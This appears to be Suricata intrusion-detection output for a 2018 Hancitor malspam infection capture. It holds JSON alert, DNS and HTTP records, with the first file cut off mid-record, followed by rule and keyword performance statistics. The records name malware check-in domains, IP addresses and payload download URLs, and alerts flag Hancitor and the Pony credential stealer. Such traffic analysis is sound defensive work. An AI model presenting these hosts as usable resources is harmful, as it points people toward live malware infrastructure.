{"timestamp":"2018-09-04T15:50:12.339083+0000","flow_id":512358085831819,"pcap_cnt":240,"event_type":"dns","src_ip":"10.9.4.102","src_port":59335,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2042,"rrname":"api.ipify.org","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"api.ipify.org","rrtype":"CNAME","ttl":5,"rdata":"nagano-19599.herokussl.com"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"nagano-19599.herokussl.com","rrtype":"CNAME","ttl":5,"rdata":"elb097307-934924932.us-east-1.elb.amazonaws.com"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.243.179.137"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"23.23.114.123"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"50.16.248.221"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"50.19.229.252"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"23.21.121.219"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.243.123.39"}}
{"timestamp":"2018-09-04T15:50:12.796998+0000","flow_id":695830498792427,"pcap_cnt":248,"event_type":"alert","src_ip":"10.9.4.102","src_port":49173,"dest_ip":"54.243.179.137","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021997,"rev":3,"signature":"ET POLICY External IP Lookup api.ipify.org","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:12.796998+0000","flow_id":695830498792427,"pcap_cnt":248,"event_type":"http","src_ip":"10.9.4.102","src_port":49173,"dest_ip":"54.243.179.137","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"api.ipify.org","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/plain"}}
{"timestamp":"2018-09-04T15:50:12.804076+0000","flow_id":729185214809324,"pcap_cnt":249,"event_type":"dns","src_ip":"10.9.4.102","src_port":58852,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25574,"rrname":"thenlorefuse.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:13.886886+0000","flow_id":729185214809324,"pcap_cnt":251,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":58852,"proto":"UDP","dns":{"type":"answer","id":25574,"rcode":"NOERROR","rrname":"thenlorefuse.com","rrtype":"A","ttl":5,"rdata":"185.66.9.184"}}
{"timestamp":"2018-09-04T15:50:14.397704+0000","flow_id":1743617835502485,"pcap_cnt":259,"event_type":"alert","src_ip":"10.9.4.102","src_port":49174,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2819978,"rev":5,"signature":"ETPRO TROJAN Tordal\/Hancitor\/Chanitor Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:14.397704+0000","flow_id":1743617835502485,"pcap_cnt":259,"event_type":"http","src_ip":"10.9.4.102","src_port":49174,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"thenlorefuse.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-09-04T15:50:14.397704+0000","flow_id":1743617835502485,"pcap_cnt":259,"event_type":"fileinfo","src_ip":"10.9.4.102","src_port":49174,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":566},"app_proto":"http","fileinfo":{"filename":"\/4\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":126,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:14.398978+0000","flow_id":1031164365510274,"pcap_cnt":260,"event_type":"dns","src_ip":"10.9.4.102","src_port":63476,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7227,"rrname":"birgroupholdings.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:14.489068+0000","flow_id":1031164365510274,"pcap_cnt":261,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":63476,"proto":"UDP","dns":{"type":"answer","id":7227,"rcode":"NOERROR","rrname":"birgroupholdings.com","rrtype":"A","ttl":5,"rdata":"184.95.44.218"}}
{"timestamp":"2018-09-04T15:50:14.854139+0000","flow_id":8485407717784,"pcap_cnt":308,"event_type":"alert","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49175,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2824549,"rev":2,"signature":"ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1)","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:14.854869+0000","flow_id":8485407717784,"pcap_cnt":318,"event_type":"http","src_ip":"10.9.4.102","src_port":49175,"dest_ip":"184.95.44.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-09-04T15:50:14.855358+0000","flow_id":8485407717784,"pcap_cnt":321,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49175,"proto":"TCP","http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":46326},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","gaps":false,"state":"CLOSED","stored":false,"size":46326,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:20.873439+0000","flow_id":332270107644895,"pcap_cnt":322,"event_type":"dns","src_ip":"10.9.4.102","src_port":53643,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":622,"rrname":"thenlorefuse.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:21.464489+0000","flow_id":332270107644895,"pcap_cnt":323,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":53643,"proto":"UDP","dns":{"type":"answer","id":622,"rcode":"NOERROR","rrname":"thenlorefuse.com","rrtype":"A","ttl":5,"rdata":"185.66.9.184"}}
{"timestamp":"2018-09-04T15:50:21.605555+0000","flow_id":1537223182588189,"pcap_cnt":329,"event_type":"alert","src_ip":"10.9.4.102","src_port":49176,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2014411,"rev":11,"signature":"ET TROJAN Fareit\/Pony Downloader Checkin 2","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:22.152587+0000","flow_id":1537223182588189,"pcap_cnt":332,"event_type":"fileinfo","src_ip":"10.9.4.102","src_port":49176,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.0","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/mlu\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":207,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:22.153985+0000","flow_id":1537223182588189,"pcap_cnt":334,"event_type":"http","src_ip":"10.9.4.102","src_port":49176,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"thenlorefuse.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2018-09-04T15:50:22.153985+0000","flow_id":1537223182588189,"pcap_cnt":334,"event_type":"fileinfo","src_ip":"185.66.9.184","src_port":80,"dest_ip":"10.9.4.102","dest_port":49176,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.0","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/mlu\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":20,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:22.737948+0000","flow_id":2217069260973895,"pcap_cnt":380,"event_type":"alert","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49177,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2824549,"rev":2,"signature":"ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1)","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:22.738803+0000","flow_id":2217069260973895,"pcap_cnt":390,"event_type":"http","src_ip":"10.9.4.102","src_port":49177,"dest_ip":"184.95.44.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/2","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-09-04T15:50:22.739261+0000","flow_id":2217069260973895,"pcap_cnt":393,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49177,"proto":"TCP","http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/2","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":47399},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/wp-file-manager\/lib\/2","gaps":false,"state":"CLOSED","stored":false,"size":47399,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:22.992232+0000","flow_id":389818374617585,"pcap_cnt":415,"event_type":"alert","src_ip":"10.9.4.102","src_port":49179,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2014411,"rev":11,"signature":"ET TROJAN Fareit\/Pony Downloader Checkin 2","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:23.145020+0000","flow_id":475507267109303,"pcap_cnt":443,"event_type":"alert","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49178,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2824549,"rev":2,"signature":"ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1)","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:23.443168+0000","flow_id":475507267109303,"pcap_cnt":597,"event_type":"http","src_ip":"10.9.4.102","src_port":49178,"dest_ip":"184.95.44.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/3","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-09-04T15:50:23.443668+0000","flow_id":475507267109303,"pcap_cnt":600,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49178,"proto":"TCP","http":{"hostname":"birgroupholding

This file has been truncated. Go here to download in full.


keyword_perf.log - (15754 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 1/28/2019 -- 12:19:23
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             30593594        7886            7886            4137909         3879.00         3879.00         0.00           
  content          181482275       37713           16294           6086040         4812.00         4225.00         5258.00        
  pcre             20871536        5194            3201            392712          4018.00         3726.00         4487.00        
  byte_test        1862559         572             301             26735           3256.00         3542.00         2938.00        
  byte_jump        532649          141             6               35766           3777.00         5072.00         3720.00        
  isdataat         48944           12              0               17341           4078.00         0.00            4078.00        
  flowbits         2159724         745             55              27418           2898.00         3370.00         2861.00        
  urilen           5232614         1620            222             24494           3230.00         3230.00         3229.00        
  byte_extract     54173           17              17              4940            3186.00         3186.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             30593594        7886            7886            4137909         3879.00         3879.00         0.00           
  flowbits         2097752         733             43              27418           2861.00         2869.00         2861.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          97931523        24299           8893            99825           4030.00         3890.00         4111.00        
  pcre             12346067        3479            2433            62655           3548.00         3371.00         3961.00        
  byte_test        1862559         572             301             26735           3256.00         3542.00         2938.00        
  byte_jump        532649          141             6               35766           3777.00         5072.00         3720.00        
  isdataat         48944           12              0               17341           4078.00         0.00            4078.00        
  byte_extract     54173           17              17              4940            3186.00         3186.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         61972           12              12              7341            5164.00         5164.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7995357         1964            1434            383684          4070.00         3921.00         4474.00        
  pcre             4290855         958             427             36917           4478.00         4497.00         4464.00        
  urilen           5232614         1620            222             24494           3230.00         3230.00         3229.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3995556         1068            295             33022           3741.00         3501.00         3832.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          219357          66              0               7467            3323.00         0.00            3323.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          34325402        631             93              6086040         54398.00        49363.00        55268.00       
  pcre             148473          32              0               17021           4639.00         0.00            4639.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          21791082        5212            3732            387316          4180.00         4320.00         3828.00        
  pcre             3251886         530             205             392712          6135.00         5814.00         6338.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2030135         535             282             41330           3794.00         3943.00         3628.00        
  pcre             18583           4               4               5275            4645.00         4645.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  pcre             221380          59              0               5139            3752.00         0.00            3752.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          791535          183             181             65236           4325.00         4328.00         4041.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_protocol
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          13889           4               4               3768            3472.00         3472.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3945963         1106            982             37815           3567.00         3543.00         3756.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1712087         437             230             22942           3917.00         4202.00         3601.00        
  pcre             594292          132             132             18785           4502.00         4502.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          4474            1               1               4474            4474.00         4474.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          454052          127             5               17795           3575.00         3247.00         3588.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: tls_cert_subject
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          518375          164             162             4197            3160.00         3162.00         3010.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: tls_cert_serial
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5753488         1916            0               31607           3002.00         0.00            3002.00        


suricata-4.0.0-etpro-all-perf.txt-2019-01-28-T-12-19-23-01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap.txt - (83798 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 1/28/2019 -- 12:19:23. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2820157      1        2        12321395     2.20   37       0        6107673     333010.68   0.00        333010.68  
  2        2820158      1        2        12119575     2.16   37       0        5981715     327556.08   0.00        327556.08  
  3        2024549      1        2        6180404      1.10   7        0        5813665     882914.86   0.00        882914.86  
  4        2022901      1        2        6841382      1.22   61       0        4188373     112153.80   0.00        112153.80  
  5        2816910      1        2        4187070      0.75   66       0        444606      63440.45    0.00        63440.45   
  6        2819881      1        2        469285       0.08   2        0        433043      234642.50   0.00        234642.50  
  7        2823858      1        3        2192217      0.39   61       0        420084      35937.98    0.00        35937.98   
  8        2807793      1        4        2197822      0.39   61       0        419282      36029.87    0.00        36029.87   
  9        2810607      1        8        522429       0.09   4        0        414997      130607.25   0.00        130607.25  
  10       2018496      1        9        441839       0.08   2        0        413467      220919.50   0.00        220919.50  
  11       2014967      1        3        1748162      0.31   61       0        412955      28658.39    0.00        28658.39   
  12       2815324      1        2        440232       0.08   2        0        411990      220116.00   0.00        220116.00  
  13       2024606      1        2        1756838      0.31   61       0        410266      28800.62    0.00        28800.62   
  14       2826256      1        2        1854688      0.33   66       0        403392      28101.33    0.00        28101.33   
  15       2016706      1        20       1763136      0.31   61       0        402905      28903.87    0.00        28903.87   
  16       2017731      1        3        400403       0.07   1        0        400403      400403.00   0.00        400403.00  
  17       2020865      1        3        1277695      0.23   7        0        294724      182527.86   0.00        182527.86  
  18       2022627      1        12       29921064     5.34   162      0        280873      184697.93   0.00        184697.93  
  19       2023476      1        5        17006011     3.04   162      0        271480      104975.38   0.00        104975.38  
  20       2815263      1        3        1144804      0.20   6        0        232870      190800.67   0.00        190800.67  
  21       2809148      1        2        218653       0.04   1        0        218653      218653.00   0.00        218653.00  
  22       2809149      1        2        204864       0.04   1        0        204864      204864.00   0.00        204864.00  
  23       2819664      1        2        912597       0.16   6        0        173935      152099.50   0.00        152099.50  
  24       2012520      1        7        164897       0.03   1        1        164897      164897.00   164897.00   0.00       
  25       2021749      1        6        227602       0.04   2        0        159178      113801.00   0.00        113801.00  
  26       2819930      1        2        897760       0.16   6        0        156654      149626.67   0.00        149626.67  
  27       2022535      1        11       14206629     2.54   162      0        154774      87695.24    0.00        87695.24   
  28       2804911      1        3        1249986      0.22   21       0        133330      59523.14    0.00        59523.14   
  29       2822213      1        2        8679469      1.55   164      0        132599      52923.59    0.00        52923.59   
  30       2829792      1        2        131472       0.02   1        0        131472      131472.00   0.00        131472.00  
  31       2824248      1        3        8588315      1.53   162      0        129557      53014.29    0.00        53014.29   
  32       2819978      1        5        3804480      0.68   59       59       123149      64482.71    64482.71    0.00       
  33       2827580      1        7        1479030      0.26   61       0        122187      24246.39    0.00        24246.39   
  34       2803027      1        6        1336791      0.24   18       0        119750      74266.17    0.00        74266.17   
  35       2828876      1        1        2869041      0.51   956      0        116124      3001.09     0.00        3001.09    
  36       2020181      1        8        2368566      0.42   61       0        114160      38828.95    0.00        38828.95   
  37       2810991      1        4        3039541      0.54   59       0        112478      51517.64    0.00        51517.64   
  38       2815817      1        5        2112479      0.38   66       0        111922      32007.26    0.00        32007.26   
  39       2021418      1        9        2787333      0.50   61       0        109246      45693.98    0.00        45693.98   
  40       2018457      1        1        5516991      0.98   164      0        109077      33640.19    0.00        33640.19   
  41       2803657      1        5        383678       0.07   5        0        107524      76735.60    0.00        76735.60   
  42       2828060      1        4        2053106      0.37   61       0        107284      33657.48    0.00        33657.48   
  43       2814020      1        2        2816386      0.50   162      0        106889      17385.10    0.00        17385.10   
  44       2820032      1        2        8192256      1.46   162      0        106266      50569.48    0.00        50569.48   
  45       2816877      1        5        8455963      1.51   162      0        105750      52197.30    0.00        52197.30   
  46       2821569      1        7        2329271      0.42   61       0        105631      38184.77    0.00        38184.77   
  47       2809363      1        3        2640061      0.47   61       0        105231      43279.69    0.00        43279.69   
  48       2020855      1        3        3675951      0.66   64       0        104761      57436.73    0.00        57436.73   
  49       2801930      1        7        1364909      0.24   22       0        104658      62041.32    0.00        62041.32   
  50       2814978      1        2        253422       0.05   3        0        104163      84474.00    0.00        84474.00   
  51       2023496      1        3        8284718      1.48   162      0        103948      51140.23    0.00        51140.23   
  52       2816328      1        5        1991158      0.36   66       0        103877      30169.06    0.00        30169.06   
  53       2801929      1        7        1428443      0.25   22       0        103293      64929.23    0.00        64929.23   
  54       2802987      1        5        1751384      0.31   30       0        102511      58379.47    0.00        58379.47   
  55       2816922      1        5        1978082      0.35   66       0        102221      29970.94    0.00        29970.94   
  56       2816356      1        2        2883339      0.51   64       0        101463      45052.17    0.00        45052.17   
  57       2820851      1        5        2607546      0.47   66       0        100814      39508.27    0.00        39508.27   
  58       2017259      1        12       3232929      0.58   59       0        100672      54795.41    0.00        54795.41   
